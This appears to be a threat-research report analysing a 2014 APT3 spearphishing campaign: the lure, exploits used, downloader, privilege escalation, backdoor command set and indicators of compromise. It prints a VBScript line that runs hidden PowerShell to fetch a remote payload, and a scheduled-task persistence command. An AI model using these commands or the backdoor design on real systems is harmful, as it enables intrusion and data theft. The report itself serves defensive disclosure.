**[APT3 (also known as UPS), the actors responsible for Operation Clandestine Fox has quietly continued to](https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html)** send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple [exploits, targeting both CVE-2014-6332 and CVE-2014-4113. CVE-2014-6332 was disclosed publicly on](https://technet.microsoft.com/en-us/library/security/ms14-064.aspx) 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014 [4113 is a privilege escalation vulnerability that was disclosed publicly on 2014-10-14.](https://www.fireeye.com/blog/threat-research/2014/10/two-targeted-attacks-two-new-zero-days.html) The use of CVE-2014-6332 is notable, as it demonstrates that multiple classes of actors, both criminal and APT alike, have now incorporated this exploit into their toolkits. Further, the use of both of these two known vulnerabilities in tandem is notable for APT3. This actor is historically known for leveraging zero day vulnerabilities in widespread but infrequent phishing campaigns. The use of known exploits and more frequent attacks may indicate both a shift in strategy and operational tempo for this group. **The Spearphish** The body of the message is below: _One Month's Free Membership for The PLAYBOY ClUB 1080P HD VIDEOS 100,000 PHOTOS_ _4,000_ _MODELS Nude Celebrities,Playmates,Cybergirls & More! Click_ _hxxp://join.playboysplus.com/signup/ To Get a Free Plus Member Now & Never Miss Another Update._ _Your Member referrals must remain active. If anyone getting "Promotion not available" for 1 month free_ _membership, you might get the issue up to 48 hrs once your membership is expired and make sure to_ _Clear out cookies or use another browser or use another PC._ The webpage contained both CVE-2014-6332 exploit code and a VBScript that invoked PowerShell on the affected users’ system to download the below payload: function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "powershell.exe","-NoLogo -NoProfile -NonInteractive -WindowStyle Hidden ( New-Object “System.Net.WebClient”).DownloadFile(“http://www.playboysplus.com ----- end function The CVE-2014-6332 exploit code seen in this incident is derived from the code published at [http://www.exploit-db.com/exploits/35230/, which has also been incorporated in the Metasploit project.](http://www.exploit-db.com/exploits/35230/) **The Downloader** After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5 5a0c4e1925c76a959ab0588f683ab437 Size 46592 bytes Compile Time 2014-11-19 08:55:10Z Import Hash 6b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path “C:\Users\Public”, which fails on Windows XP because that path is not present by default. The first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the elevated privileges. These files have the following metadata: doc.exe (x86): MD5 492a839a3bf9c61b7065589a18c5aa8d Size 12288 bytes Import Hash 9342d18e7d315117f23db7553d59a9d1 doc.exe (x64): MD5 744a17a3bc6dbd535f568ef1e87d8b9a Size 13824 bytes Compile Time 2014-11-19 08:25:45Z Import Hash 2fab77a3ff40e4f6d9b5b7e813c618e4 test.exe: ----- Size 11264 bytes Compile Time 2014-11-18 10:49:23Z Import Hash f34d5f2d4577ed6d9ceec516c1f5a744 These payload files also have interesting PDB debug strings. install.exe: c:\Users\aa\Documents\Visual Studio 2008\Projects\MShell\Release \MShell.pdb doc.exe: c:\Users\aa\Documents\Visual Studio 2008\Projects\4113\Release \4113.pdb test.exe: C:\Users\aa\Documents\Visual Studio 2010\Projects\MyRat\Client\Client \obj\x86\Release\Client.pdb The most interesting PDB string is the “4113.pdb,” which appears to reference CVE-2014-4113. This CVE is a local kernel vulnerability that, with successful exploitation, would give any user SYSTEM access on the machine. The malware component, test.exe, uses the Windows command "cmd.exe" /C whoami” to verify it is running with the elevated privileges of “System” and creates persistence by creating the following scheduled task: schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System" When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913. The malware sends the SOCKS5 connection request "05 01 00" and verifies the server response starts with "05 00". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command "05 01 00 01 c0 b8 3c e5 00 51" and verifies that the first two bytes from the server are "05 00" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order). Once the connection to the server is established, the malware expects a message containing at least three bytes from the server. These first three bytes are the command identifier. The following commands are supported by the malware: ----- 00 00 00 Content after command ID is written to: C:\Users\ [Username]\AppData\Local\Temp\notepad1.exe 00 00 01 Deletes the files: C:\Users\ [Username]\AppData\Local\Temp\notepad.exe C:\Users\ [Username]\AppData\Local\Temp\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID. The file is saved to: C:\Users\ [Username]\AppData\Local\Temp\notepad.exe 00 00 04 Content after command ID is written to: C:\Users\ [Username]\AppData\Local\Temp\notepad2.exe 00 00 05 The files notepad1.exe and notepad2.exe are concatenated together and written to C:\Users\ [Username]\AppData\Local\Temp\newnotepad.exe and executed 00 00 06 The contents of the following file is sent to the server: C:\Users\ [Username]\AppData\Local\Temp\note.txt 00 00 07 The string following the command ID is executed using "cmd /C" and results are sent to server **Links to APT3** On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains: inform.bedircati[.]com pn.lamb-site[.]com 210.109.99.64 |Col1|C:\Users\ [Username]\AppData\Local\Temp\notepad1.exe| |---|---| |00 00 01|Deletes the files: C:\Users\ [Username]\AppData\Local\Temp\notepad.exe C:\Users\ [Username]\AppData\Local\Temp\newnotepad.exe| |00 00 02|Malware exits| |00 00 03|Malware downloads the URL that follows the command ID. The file is saved to: C:\Users\ [Username]\AppData\Local\Temp\notepad.exe| |00 00 04|Content after command ID is written to: C:\Users\ [Username]\AppData\Local\Temp\notepad2.exe| |00 00 05|The files notepad1.exe and notepad2.exe are concatenated together and written to C:\Users\ [Username]\AppData\Local\Temp\newnotepad.exe and executed| |00 00 06|The contents of the following file is sent to the server: C:\Users\ [Username]\AppData\Local\Temp\note.txt| |00 00 07|The string following the command ID is executed using "cmd /C" and results are sent to server| ----- known domain referenced in our Operation Clandestine Fox blog. DOMAIN FIRST SEEN LAST SEEN IP ADDRESS securitywap.com 2014-11-17 2014-11-20 192.184.60.229 www.securitywap.com 2014-11-17 2014-11-20 192.184.60.229 In addition, the join.playboysplus[.]com exploit and payload delivery site resolves to 104.151.248.173. This IP has hosted other domains used by APT3 in past campaigns: DOMAIN FIRST SEEN LAST SEEN IP ADDRESS join.playboysplus[.]com 2014-11-21 2014-11-21 104.151.248.173 walterclean[.]com 2014-11-18 2014-11-20 104.151.248.173 www.walterclean[.]com 2014-11-18 2014-11-20 104.151.248.173 [As we discussed in our previous blog detailing previous APT3 activity, the walterclean[.]com served as a](https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html) Plugx/Kaba command and control server. **Conclusion** Although APT3 is well known for employing zero-day exploits in their attacks, recent activity has demonstrated that they will also attack targets with known exploits or social engineering. Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits. The combination of this sustained operational tempo and lack of zero-day **exploits may indicate that this group has changed strategy and has decided to attack more** **frequently and does not have steady access to zero-day exploit code. No matter the strategy,** this actor has shown an ability to operate successfully. [IOCs for this threat can be found here.](https://github.com/fireeye/iocs/tree/master/APT3) |DOMAIN|FIRST SEEN|LAST SEEN|IP ADDRESS| |---|---|---|---| |securitywap.com|2014-11-17|2014-11-20|192.184.60.229| |www.securitywap.com|2014-11-17|2014-11-20|192.184.60.229| |DOMAIN|FIRST SEEN|LAST SEEN|IP ADDRESS| |---|---|---|---| |join.playboysplus[.]com|2014-11-21|2014-11-21|104.151.248.173| |walterclean[.]com|2014-11-18|2014-11-20|104.151.248.173| |www.walterclean[.]com|2014-11-18|2014-11-20|104.151.248.173| -----